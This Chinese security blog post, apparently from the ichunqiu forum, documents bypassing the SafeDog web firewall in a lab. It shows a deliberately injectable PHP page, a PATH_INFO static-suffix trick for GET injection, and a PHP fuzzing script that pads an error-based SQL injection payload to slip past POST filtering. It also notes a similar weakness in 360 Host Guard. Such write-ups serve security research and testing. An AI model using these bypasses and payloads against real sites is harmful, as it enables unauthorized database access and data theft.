首页 > 代码库 > 记一次720度托马斯回旋过狗!

记一次720度托马斯回旋过狗!

作者:索马里的海贼

来源:ichunqiu

本文属i春秋原创奖励计划,未经许可禁止转载!
前言
前些日子测试漏洞碰上了安全狗,一直做代码审计没什么实战经验 被虐的不要不要的。找了一些网上的方法,基本上封的封有限制的有限制,没什么通用的好方法(当然也可能是我找的姿势不对)。昨天有点时间就特地看了下安全狗的逻辑做了一些fuzz,成功bypass了GET和POST的注入防御,不是特别通用,就当给大伙分享一些思路。

正文
测试环境
Windows Server 2003 Enterprise Edition Service Pack 2
Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
网站安全狗(APACHE版) V3.5正式版

  • 1.主程序版本:3.5.12048
  • 2.网马库版本:2016-06-29

测试代码
sqlin.php:

<?php

$link = mysql_connect(‘localhost‘, ‘root‘, ‘root‘); mysql_select_db(‘anquangou‘, $link);


$sql = ‘select * from `user` where `id`=‘.$_REQUEST[‘id‘]; echo $sql."<br>\n";

$result =mysql_query($sql);

while($array = mysql_fetch_assoc($result)){ echo "id:".$array[‘Id‘]."<br />\n";

echo "username:".$array[‘username‘]."<br />\n"; echo "password:".$array[‘password‘]."<br />\n";

}

echo mysql_error();

 

数据库:

 

# Host: localhost        (Version: 5.5.53)

#        Date: 2016-11-19 17:57:30

#        Generator: MySQL-Front 5.3 (Build 4.234)

/*!40101 SET NAMES utf8 */;

#

# Structure for table "admin"

#

DROP TABLE IF EXISTS `admin`;

CREATE TABLE `admin` (

`Id` int(11) NOT NULL AUTO_INCREMENT, `admin_name` varchar(255) DEFAULT NULL, `admin_pass` varchar(255) DEFAULT NULL, PRIMARY KEY (`Id`)

) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

#

# Data for table "admin"

#

/*!40000 ALTER TABLE `admin` DISABLE KEYS */; INSERT INTO `admin` VALUES (1,‘admin‘,‘admin888‘);

/*!40000 ALTER TABLE `admin` ENABLE KEYS */;

#

# Structure for table "user"

#

DROP TABLE IF EXISTS `user`;

CREATE TABLE `user` (

`Id` int(11) NOT NULL AUTO_INCREMENT, `username` varchar(255) DEFAULT NULL, `password` varchar(255) DEFAULT NULL, PRIMARY KEY (`Id`)

) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;

#

# Data for table "user"

#

/*!40000 ALTER TABLE `user` DISABLE KEYS */;


INSERT INTO `user` VALUES (1,‘user‘,‘userpass‘),(2,‘user2‘,‘upass2‘); /*!40000 ALTER TABLE `user` ENABLE KEYS */;


GET型注入

GET型的注入其实能动手脚的地方不多,就一个url。安全狗没有公开自己的防护规则,不过有添加规则的功能,看了下是用正则语法。猜测官方规则应该也是正则。绕过有两种选择:

1.绕过正则的匹配,匹配失败当然就不会被拦截了。

2.绕过(或者打乱)程序的逻辑。不进入匹配逻辑也就不会拦截了。

对于正则绕过,在不知道防护规则具体正则表达式的前提下,就只能fuzz了,各种穿插配合。不过我尝试的是第二种方法。

安全狗的原理是往Web Service中注入一个模块,抢在Web Service处理之前获得HTTP请求并根据规则处理,没问题就交给Web Service继续处理,有问题就拦截并返回自定义错误信息。
一个简单的测试

技术分享

fakefile.php实际上并不存在,但是仍然会被安全狗拦下来。当然也包括php5 php4 asp cer asa等等等等 甚至扩展名是.111都会拦截。不过也有例外,常见的静态文件(.js .jpg .swf .css等等)它是不管的。
技术分享
可以看到并没有出拦截提示而是直接404了 所以猜测安全狗应该是存在类似白名单机制的,特定的静态资源后缀请求就不处理直接交给webserver 这种处理看起来没问题其实是存在隐患的 Apache和IIS默认都开启pathinfo支持 来做个测试
技术分享
对php来说 请求的是sqlin.php 后面的/pathinfo.css是 PATH_INFO 但是安全狗好像把 pathinfo.css 当作了真正的请求对象,因为是静态资源 所以不做处理直接把请求丢给了php。
就这么秒了?对。。是不是so easy?
        
POST型注入
POST型再用pathinfo就不好使了 因为正常对静态资源的请求不会用post 所以也不用什么白名单了 任何POST请求都要先进狗嘴了绕一圈 那么就想办法来fuzz一下吧 构造一个post脚本

<?php $i=10000;

$url = ‘http://192.168.1.121/sqlin.php‘; for(;;){

$i++;


echo "$i\n";


$payload = ‘id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1=‘.str_repeat(‘3‘,$i); $ret = doPost($url,$payload);


if(!strpos($ret,‘网站防火墙‘)){


echo "done!\n".strlen($payload)."\n".$ret; die();

}


}



function doPost($url,$data=http://www.mamicode.com/‘‘){ $ch=curl_init();

curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_HEADER, 0 ); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); $return = curl_exec ($ch);


curl_close ($ch); return $return;

}


在正常的注入语句后面加入超长字符串 然而跑了很久都没结果 于是停下脚本 换换位置 把超长字符串放在中间

$payload = ‘id=-1 and 1=‘.str_repeat(‘3‘,$i).‘ and (extractvalue(1,concat(0x7e,(select user()),0x7e)))‘;

跑起来

技术分享

wtf?又秒了?浏览器中试一下
技术分享

太坑了 我才刚脱裤子你告诉我结束了

后记

其实实际测试中过程要复杂的多,时间关系挑了成功的步骤写一下pathinfo其实是一个很容易被忽视的问题 顺带测试了一下360的主机卫士 也存在相同的问题。而且360的主机卫士自带的白名单还有类似于dede admin 这样的(后台操作不防御)可以用
http://example.com/index.php/admin/?id=sql注入这种方式来秒

更多安全技术、精品好文、白帽黑客大佬尽在:http://bbs.ichunqiu.com/portal.php

记一次720度托马斯回旋过狗!